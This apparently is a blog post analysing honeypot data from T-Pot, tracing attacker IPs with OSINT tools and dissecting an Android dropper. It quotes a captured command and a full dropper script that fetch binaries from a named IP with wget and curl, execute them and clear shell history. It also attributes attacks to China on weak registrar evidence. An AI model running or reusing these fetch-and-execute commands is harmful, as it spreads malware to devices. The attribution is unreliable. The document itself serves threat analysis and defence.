1 Hour OSINT

I was recently tasked with using honeypots to study unanticipated behavior in cyberspace. Here is what I found using the AWS T-POT Honeypot framework (https://github.com/telekom-security/tpotce).

As detailed in a recent news article by the NY Times: https://www.nytimes.com/2021/03/14/us/politics/us-hacks-china-russia.html , China is using US-based infrastructure to launch cyber attacks against the United States. Here is an example.

First, I logged into the TPOT web interface of the Adbhoney honeypot setup in US-EAST-1 and hopped into Kibana. I then filtered on known attacker, chosing the source IP with largest count: 209.141.51.242.

Following this, I used the Talos Intelligence and Whois plugins to find out more information on this IP address.

Talos Intelligence screen on this particular IP

Associated IP addresses from the same subnet

Domain name and owner

We see that the Domain owner for this IP subnet is Chinaregistry-shanghai.org, which redirects to chinaregistry.org.cn, which means it is owned by China’s official domain.

“China’s favourite and most trusted domain name registrar” — “China Registry remains an Chinese-owned and run company”

I also took a look at the network owner, Frantech Solutions, to see where this IP address is hosted.

We also can see additional IP addresses associated with this Network Owner.

This analysis was performed for a honeypot data collection range of 2 weeks.

In conclusion, we see a US-based brand being used to host IP addresses owned by, and launching attacks originating from China. Specifically, “lat”: 36.1685, “lon”: -115.1164, Las Vegas, Nevada.

*Now we take a look at an unrelated attempt at compromise.*

attacker tried this 9 times; possibly automated

The attacker IP address in this scenario is 45.144.225.228.

The full line of this command is:

cd /data/local/tmp/; wget http://31.210.20.138/sh.sh; sh sh.sh; curl http://31.210.20.138/c.sh; sh c.sh

We take a look at the first file attempt: sh.sh

Submitting this sample to hybrid-analysis yields some interesting information:

https://hybrid-analysis.com/sample/b6a5250175165b8ec44f55840a0b086769274e7e38c938865572b4cf3ef9682d

mostly evades AV, but still gets spotted

the cyber community has flagged this malware before

We also use the reconnaissance tool Spiderfoot (https://www.spiderfoot.net/documentation/) to analyze the attacker IP address by automatically querying over 100 public data sources:

This IP address comes from a known malicious subnet

A graph showing relationships between the attacker IP (red node) and other associated information. The first set of nodes surrounding the IP are IP addresses from the same subnet. Other nodes include information such as email addresses, country names, netblock membership, and physical coordinates

To extract the lines in this file, we can use the integrated tools on hybrid-analysis.com or by running:

wget http://31.210.20.138/sh.sh > sh.sh.txt

followed by:

cat sh.sh.txt

The extracted strings, one-by-one, for this file is as follows:

#!/bin/sh
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm5; chmod 777 *;./arm5 Android.arm5;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm6; chmod 777 *;./arm6 Android.arm6;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm7; chmod 777 *;./arm7 Android.arm7;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm; chmod 777 *;./arm Android.arm;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/m68k; chmod 777 *;./m68k Android.m68k;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/mips; chmod 777 *;./mips Android.mips;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/mpsl; chmod 777 *;./mpsl Android.mpsl;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/ppc; chmod 777 *;./ppc Android.ppc;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/sh4; chmod 777 *;./sh4 Android.sh4;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/spc; chmod 777 *;./spc Android.spc;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/x86; chmod 777 *;./x86 Android.x86;rm -rf *;history -w;history -c

Adbhoney is an Android honeypot, so this malicious script is acting as a form of dropper malware, attempting to download additional exploits.

In turn, the malware attempts to move to a world-writable directory, tmp; download further malware; make the new malware executable; run the new malware; delete the file from the target system; and then delete history of it’s execution. It attempts this for several malware types, likely to ensure execution on an Android whose OS specifics the attacker may not know.

In the next blog post, we will take a look at the x86 malware from the last line, what it may be for, and what possible motivations the attacker may have for using it.